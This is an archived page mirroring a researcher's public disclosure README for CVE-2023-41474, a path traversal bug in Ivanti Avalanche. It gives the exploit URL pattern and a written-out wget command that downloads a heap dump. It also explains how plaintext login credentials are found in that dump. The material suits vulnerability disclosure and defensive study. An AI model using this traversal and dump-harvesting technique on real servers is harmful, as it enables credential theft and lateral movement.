Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-41474 PoC — Ivanti Avalanche 安全漏洞

Source
https://github.com/JBalanza/CVE-2023-41474
Associated Vulnerability
Title:Ivanti Avalanche 安全漏洞 (CVE-2023-41474)
Description:Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.
Description
Public disclosure of Ivanti's Avalanche Path Traversal vulnerability
Readme
# IVANTI AVALANCHE - PATH TRAVERSAL

A new vulnerability has been found on Ivanti Avalanche. Tested on Avalanche Server `v6.3.4.153` and identified as CVE-2023-41474.

It’s a limited unauthenticated path traversal vulnerability, meaning that unauthorized attackers can access to any file under 
`C:\\PROGRAM DATA\\Wavelink\\AVALANCHE\\Web\ webapps\AvalancheWeb` in a default configuration. However, only some file extensions 
are affected to be displayed like `.xml` or `.html` (there are some more and they also depend on .htaccess rules).

To exploit this issue, an attacker can use the following URL:

`<domain>/AvalancheWeb//faces/javax.faces.resource/<file>?loc=<directory>`

As an example, the attacker can access to `web.xml` file under the parent directory `WEB-INF`. The request can be modified to access any file in any subdir.
To reproduce the attack any program like wget or curl can be used with basic arguments.
The following BurpSuite screenshot can be used as an example of successful exploitation.

![Request](images/Picture1.png)
![Continuation of the response](images/Picture2.png)

# Increasing the impact

In a real scenario, an unauthenticated attacker can access to configuration settings and other internal information with low confidentiality impact.
However, in some scenarios there are files in this directory that can be used for session hijacking and have a complete server compromission.
If the attacker possesses administrative privileges (or there is an administrator that performed this step previously), it can perform a Heap dump 
of the Avalanche process (this functionality exists originally for debugging purposes). The functionality can be found at 
`Tools > Support and Licensing > Web Application Server > “Heap Dump” and/or “Thread Dump”`

![Thread dump](images/Picture3.png)

A successful response of the server includes the path where the process dump is stored.

![Thread dump](images/Picture4.png)

Since the file is stored at `C:\Program Files\Wavelink\Avalanche\Web\webapps\ AvalancheWeb\dump.hprof` it’s hence more accessible via the path traversal 
attack. Now, it’s time the attacker to download the dump file and perform an analysis of it. 

`wget --no-check-certificate '<domain>/AvalancheWeb//faces/javax.faces .resource/dump.hprof?loc=../'`

Via performing some basic string searches, it’s possible to find the login request’s bodies still in memory. 

![Thread dump](images/Picture5.png)

Within the bodies, username and passwords are exposed to attackers. They can use this information to elevate privileges or move laterally 
within the environment.
File Snapshot

 [4.0K]  /data/pocs/f2c310bae6fdabbd8074a25f46d3f296f774230f
├── [4.0K]  images
│   ├── [179K]  Picture1.png
│   ├── [ 78K]  Picture2.png
│   ├── [ 63K]  Picture3.png
│   ├── [109K]  Picture4.png
│   └── [185K]  Picture5.png
├── [ 11K]  LICENSE
└── [2.6K]  README.md

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →